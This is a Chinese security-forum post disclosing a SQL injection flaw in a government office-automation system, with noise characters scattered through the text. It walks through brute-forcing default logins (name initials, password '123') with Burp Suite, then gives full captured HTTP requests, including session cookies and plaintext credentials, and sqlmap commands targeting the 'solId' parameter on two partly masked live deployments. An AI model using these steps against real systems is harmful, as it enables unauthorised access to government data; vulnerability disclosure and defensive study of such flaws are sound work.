' Z9 u& P' ^! \. }
平台简介:, O( t7 k9 _6 D6 }- m& r8 J: K
u! c3 a/ W+ T% d- G( k3 c/ O4 R+ _) ?' v8 A3 e L$ U
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
; ?) u+ J: G. [9 t- B+ H+ D
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!" P4 V+ X9 ~9 n2 M
* f$ y* h" c F: F 7 k: i; b3 G+ E! T) a4 l
) [! g( n g7 C/ Q* f) u O, ?由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:1 z+ O$ U8 b( x8 U
http://1.1.1.1:7197/cap-aco/#(案例2-)
1 H/ k+ ]( q8 R! p# i http://www.XXOO.com (案例1-官网网站)
& Y8 p" m& k$ s2 y9 ^1 x2 _5 V, Q/ y1 x: Z" f+ @! m6 m3 c4 S2 Z; v
* h# ^# W( ?2 c+ q/ ]$ \; J 漏洞详情:# T4 j: C! B8 V0 ]/ f. P
' I- I+ P* {4 |初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试( G8 i' ?. M9 l. _$ M+ K
- ]0 n& A. E9 @! i首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
( M" D3 h: G" {1 q6 Y. w' u$ T0 k5 O! `$ ?. ~+ B
6 ~' L0 R/ z/ w' d
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:8 j! R3 l/ M3 P5 C; i$ q2 H) B+ S. Z
. O) F8 B7 ]! {9 S/ F/ {/ h1、案例1-官方网站! c0 x7 g6 O# I: j: p) H
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.15 |9 ^0 ]9 _1 [$ v0 S
1 b% e% s K, z. I" j5 Z" l Host: www.XXOO.com
5 u( ^& s* t# }9 b4 A Proxy-Connection: Keep-Alive, Z) [* \9 R. }/ K3 D- n. [$ o
/ C- j* N. S# P3 A4 j! E9 f( q6 j8 d+ B5 Z; Z2 S9 E) B p Accept: application/json, text/javascript, */*; q=0.011 i" c& x9 {( u3 c
Accept-Language: zh-CN U# y+ E' m" y# o
7 v7 P. h9 o0 hContent-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko& H4 b( ^/ P. V G6 V
& w _4 M1 k9 r8 D% n: a1 t) `# ]1 o. d! ?, Y X-Requested-With: XMLHttpRequest& h' y" l0 o u6 @9 W z9 v
; G5 x1 w* g' [# f' p Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002* L! p7 i/ K) ~. w5 m
4 h; p& d( D/ C& K0 i Accept-Encoding: gzip, deflate, sdch, I' @" O) g0 h5 c4 ~
6 W9 L9 q3 _& t( y* i8 w2 ^Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e- @& c( ^( U! p& M
$ ]/ A' m# ^$ s1 r将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:1 P3 n" h N. V% I
3 j& ^! i+ \; w- h- I% D3 C
& Z0 N! j9 P: G* I* q' V$ h1 Q
8 X n. ]- j$ L8 ~4 q
' Q0 d0 @& a, Q* f
5 u5 B' `; J2 Z' h' K0 `
" i; S1 P9 Z6 K6 o2 c# _) w! C4 @+ _7 f 2、案例2-某天河云平台6 X; {2 _ `+ A, i
B) m `0 l1 H8 m. G; jGET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 ~* x, w5 s% X7 J5 [5 h- I( ~! c# j: S
+ q+ I' f# F$ t& F( J: E' x8 s G& s" Z( J Host: 1.1.1.:7197: a( Z# r9 K: V! P2 o
4 ?/ i; h; T1 s& o7 Q Accept: application/json, text/javascript, */*; q=0.01- N/ U; W# L0 h# U
' g& R. G0 N+ N$ ^' ^X-Requested-With: XMLHttpRequest+ K3 s% y* B& Z2 b5 h: ^2 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0- ~9 E' D9 B% f7 r5 P% v& g$ {
5 `; p3 ~% t) L( L7 FContent-Type: application/json
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
Accept-Language: zh-CN,zh;q=0.8
5 x- z L" d) E. v1 K$ ^7 ?8 e$ g1 K8 h; A Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
Connection: close0 X" g6 n- y7 n- M: F
5 B: F, Z6 @& b l: b! Y( ^) `0 c& _' U& w 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
: D6 k/ x2 G% w) S
1 k8 K m+ s. ]7 v! _4 ^7 E/ {5 I5 o
1 w& v7 v, }2 Z4 v) V4 p
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |